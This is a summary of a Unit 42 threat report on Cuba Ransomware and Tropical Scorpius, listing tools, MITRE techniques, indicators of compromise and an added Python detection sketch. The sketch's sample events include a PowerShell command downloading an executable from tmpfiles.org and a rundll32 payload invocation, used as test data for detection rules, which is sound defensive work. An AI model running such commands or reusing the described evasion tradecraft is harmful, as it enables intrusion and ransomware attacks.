Unit 42 analyzes Tropical Scorpius (UNC2596) activity, detailing Cuba Ransomware’s evolution with new tools like ROMCOM RAT, KerberCache, and a kernel driver to defeat defenses, plus its connection to the Industrial Spy marketplace. The report covers ransomware capabilities, defense evasion, privilege escalation, lateral movement, C2 channels, and related infrastructure. #CubaRansomware #TropicalScorpius
Key points
- Cuba Ransomware, attributed to Tropical Scorpius (UNC2596), has evolved to include ROMCOM RAT, KerberCache, a kernel driver, and the use of ZeroLogon, with expanded capabilities since 2022.
- The group employs double extortion with a leak site and has ties to the Industrial Spy data marketplace for exfiltrated data.
- Initial access includes exploits of Microsoft Exchange vulnerabilities (ProxyShell/ProxyLogon) and distribution via Hancitor attachments.
- Ransomware functionality encrypts files (FIDEL.CA header, .cuba extension) and prioritizes certain processes; the cryptography uses WolfSSL crypto (ChaCha for file encryption, RSA for key encryption).
- Defense evasion relies on an unsigned dropper that writes a kernel driver (ApcHelper.sys) to disk; the driver locates security products and terminates them.
- Kerberos-related credential theft (Kerberoasting) employs GetUserSPNs.ps1 and a tool named KerberCache to extract and use cached tickets.
- ROMCOM RAT provides a robust C2 channel (HTTP via WinHTTP, with ICMP as a fallback); a 2.0 variant adds commands and local socket behavior on loopback addresses (127.0.0.3/2).
MITRE Techniques
- [T1105] Ingress Tool Transfer – The dropper/tools were downloaded from tmpfiles[.]org using PowerShell’s Invoke-WebRequest. – ‘The local privilege escalation tool leveraged by Tropical Scorpius was initially downloaded from the web hosting platform tmpfiles[.]org by using PowerShell’s Invoke-WebRequest.’
- [T1059.001] PowerShell – Tools and payloads are downloaded and used via PowerShell (Invoke-WebRequest). – ‘The local privilege escalation tool leveraged by Tropical Scorpius was initially downloaded … using PowerShell’s Invoke-WebRequest.’
- [T1053.005] Windows System Services: Scheduled Task – ROMCOM 2.0 uses Task Scheduler COM interfaces to register and manage tasks (e.g., task7/startInet). – ‘Table 3. Names of tasks registered through the Task Scheduler COM interfaces.’
- [T1218.011] Signed Binary Proxy Execution: Rundll32 – ROMCOM uses rundll32.exe to invoke DLL code (mskms.dll) with arguments, enabling execution and C2 beacons. – ‘Finally, an action is set for the task, with the action path to rundll32.exe and the argument set to C:\Windows\system32\mskms.dll,ARGUMENT.’
- [T1543.003] Windows Service – Kernel driver is loaded via a new Windows service, enabling persistent execution and driver actions. – ‘The loader copies the kernel driver responsible for terminating security products onto the file system.’
- [T1562.001] Impair Defenses – Kernel dropper targets and terminates security products (ApcHelper.sys). – ‘The dropper writes a kernel driver to the file system called ApcHelper.sys. This targets and terminates security products.’
- [T1071.001] Web Protocols – ROMCOM’s C2 beaconing uses HTTP via WinHTTP, with fallbacks to ICMP for C2. – ‘beacon out to its C2 server’ and ‘If the connection fails, ROMCOM attempts to connect to and communicate with the C2 server using ICMP requests.’
- [T1041] Exfiltration Over C2 Channel – Exfiltrated data is posted for sale or transmitted to C2/Marketplace (Industrial Spy). – ‘the exfiltrated data was posted for sale on the Industrial Spy marketplace.’
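The techniques listed above translate directly into detection content. The following is an added example (not Unit 42's code) that runs simple rules for the tmpfiles[.]org download, the rundll32.exe/mskms.dll invocation and the ApcHelper.sys driver write over constructed process-creation events, plus a file-triage check for the FIDEL.CA header and .cuba extension; the event format and sample lines are assumptions, the indicators come from the summary.

```python
"""Detection sketch for the Tropical Scorpius behaviours summarised above.

Added example, not Unit 42's code. The event lines are constructed in a
simplified "image | command line" form to exercise the rules; the indicators
(ApcHelper.sys, mskms.dll, tmpfiles.org, .cuba / FIDEL.CA) come from the report.
"""
import re

# Each rule: (name, MITRE technique, compiled regex applied to the whole event line)
RULES = [
    ("kernel-driver-dropper", "T1562.001",
     re.compile(r"ApcHelper\.sys", re.IGNORECASE)),
    ("rundll32-mskms", "T1218.011",
     re.compile(r"rundll32(\.exe)?\s+.*mskms\.dll", re.IGNORECASE)),
    ("powershell-tmpfiles-download", "T1105",
     re.compile(r"Invoke-WebRequest.*tmpfiles\.org", re.IGNORECASE)),
]

FIDEL_MARKER = b"FIDEL.CA"  # header the summary attributes to Cuba-encrypted files


def match_events(lines):
    """Return one (rule, technique, line) tuple per rule each event line triggers."""
    hits = []
    for line in lines:
        for name, technique, pattern in RULES:
            if pattern.search(line):
                hits.append((name, technique, line))
    return hits


def looks_cuba_encrypted(name, header):
    """Triage check: .cuba extension and the FIDEL.CA marker at the file start."""
    return name.lower().endswith(".cuba") and header.startswith(FIDEL_MARKER)


# Constructed events (not real telemetry) in "image | command line" form
SAMPLE_EVENTS = [
    r"powershell.exe | powershell -c Invoke-WebRequest https://tmpfiles.org/dl/x -OutFile C:\Users\Public\a.exe",
    r"rundll32.exe | rundll32.exe C:\Windows\system32\mskms.dll,ARGUMENT",
    r"dropper.exe | dropper.exe --install C:\Windows\System32\drivers\ApcHelper.sys",
    r"notepad.exe | notepad.exe C:\Users\u\notes.txt",  # benign control line
]

if __name__ == "__main__":
    for name, technique, line in match_events(SAMPLE_EVENTS):
        print(f"[{technique}] {name}: {line}")
```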
Indicators of Compromise
- [File Hash] Driver Dropper – 07905de4b4be02665e280a56678c7de67652aee318487a44055700396d37ecd0, af6561ad848aa1ba53c62a323de230b18cfd30d8795d4af36bf1ce6c28e3fd4e
- [File Hash] ZeroLogon Hacktool – ab5a3bbad1c4298bc287d0ac8c27790d68608393822da2365556ba99d52c5dfb, 6866e82d0f6f6d8cf5a43d02ad523f377bb0b374d644d2f536ec7ec18fdaf576
- [File Hash] Cuba Ransomware – 0a3517d8d382a0a45334009f71e48114d395a22483b01f171f2c3d4a9cfdbfbf, 0eff3e8fd31f553c45ab82cc5d88d0105626d0597afa5897e78ee5a7e34f71b3
- [File Hash] Privilege Escalation Tool – a4665231bad14a2ac9f2e20a6385e1477c299d97768048cb3e9df6b45ae54eb8
- [File Hash] KerberCache Hacktool – cfe7b462a8224b2fbf2b246f05973662bdabc2c4e8f4728c9a1b977fac010c15
- [File Hash] ROMCOM RAT – B5978cf7d0c275d09bedf09f07667e139ad7fed8f9e47742e08c914c5cf44a53, 324ccd4bf70a66cc14b1c3746162b908a688b2b124ad9db029e5bd42197cfe99
- [Domain] Infrastructure – CombinedResidency[.]org, optasko[.]com
Read more: https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/